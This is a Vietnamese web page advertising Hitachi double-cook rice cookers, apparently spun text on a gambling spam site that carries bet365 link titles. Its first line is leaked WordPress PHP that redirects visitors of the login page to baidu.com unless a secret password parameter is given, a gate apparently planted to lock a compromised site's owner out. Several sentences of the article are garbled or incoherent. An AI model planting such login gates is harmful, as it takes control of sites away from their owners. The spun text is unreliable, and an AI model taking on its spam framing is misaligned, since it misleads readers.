//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Chức năng nấu của nồi cơm điện đa năng Hitachi | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Chức năng nấu của nồi cơm điện đa năng Hitachi

Là một trong những sản phẩm mang thông điệp “nâng tầm cuộc sống”, dòng sản phẩm nồi cơm điện đôi Hitachi còn có những chức năng ưu việt như công nghệ nấu cơm và thức ăn song song nên được nhiều chị em săn lùng. Với nhiều chương trình nấu ăn.

Nấu ăn nhanh, quy trình nấu nướng đa dạng

Cuộc sống hiện đại ngày càng nhiều áp lực, phụ nữ càng ít vào bếp. Đồng thời, các nhu cầu về dinh dưỡng, vệ sinh và an ninh lương thực luôn được ưu tiên hàng đầu. Nó đòi hỏi đầu tư vào các thiết bị nhà bếp thông minh trong đó có nồi cơm điện, đây là một sản phẩm mạnh mẽ giúp việc nấu nướng trở nên nhẹ nhàng hơn.

Bữa ăn dinh dưỡng của gia đình sẽ trở nên đa dạng và hấp dẫn hơn.

Hiểu được điểm này, Hitachi tiếp tục tích hợp công nghệ nấu song song (Double Cook) trên nồi cơm điện. Tính năng này cho phép người dùng nấu và nấu cùng một lúc, từ đó tối ưu thời gian chuẩn bị cho bữa cơm gia đình. Bạn chỉ cần cho nguyên liệu chế biến món ăn lên trên và nấu cơm trên tủ hấp bên dưới, sau đó chọn chế độ nấu song song (“nấu hai lần”) để nấu các món ăn và sinh nhiệt trong quá trình nấu.

Đồng thời, chế độ nấu tự động (công thức tự động) của nồi cơm điện Hitachi còn cho phép người dùng đa dạng hóa bữa ăn hàng ngày thành 40 thực đơn khác nhau trong các món hầm, hấp, nấu cháo đến bánh hướng dẫn đi kèm, nay chỉ cần Một vài bước đơn giản-nhanh chóng và tiện lợi, với nhiều chương trình nấu với 40 thực đơn.-Cấu tạo khác biệt-Nồi cơm điện đôi Hitachi lòng nồi hợp kim nhôm dày 5 lớp tôn đối lưu Cải tiến thiết kế không chỉ cải thiện độ bền mà còn tăng khả năng truyền nhiệt. Có dòng chảy đều khắp thành nồi nên cơm luôn chín đều và ngon hơn.

Ngoài ra, chức năng hẹn giờ của nồi cơm điện Hitachi cho phép người dùng chủ động kiểm soát thời gian nấu các món ăn. Chuẩn bị bữa ăn. Vào đúng thời điểm, m phù hợp với những người không biết nấu ăn. Quản lý của nồi cơm điện Hitachi được đánh giá cao bởi khả năng kiểm soát nhiệt độ chính xác trong từng bước của quá trình nấu. Đầu tiên, gạo được ngâm trong nước ở nhiệt độ trung bình và sau đó đun sôi. Khi cơm chín, phần nước thừa sẽ bay hơi từ từ và trải qua quá trình hấp đặc biệt. Nhờ vậy hạt cơm thơm ngon, chín kỹ và luôn nóng hổi khi dùng.

Bộ vi xử lý điều khiển thông minh giúp hạt cơm dẻo, ngon, tròn đều.

Với tính năng hiện đại và sang trọng, sử dụng công nghệ nấu song song, bạn có thể chuẩn bị bữa ăn với nồi cơm điện Hitachi Double Cook hiện nay thật nhanh chóng và tiện lợi. Tham khảo thêm các sản phẩm khác tại đây.

(Nguồn: Hitachi)

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365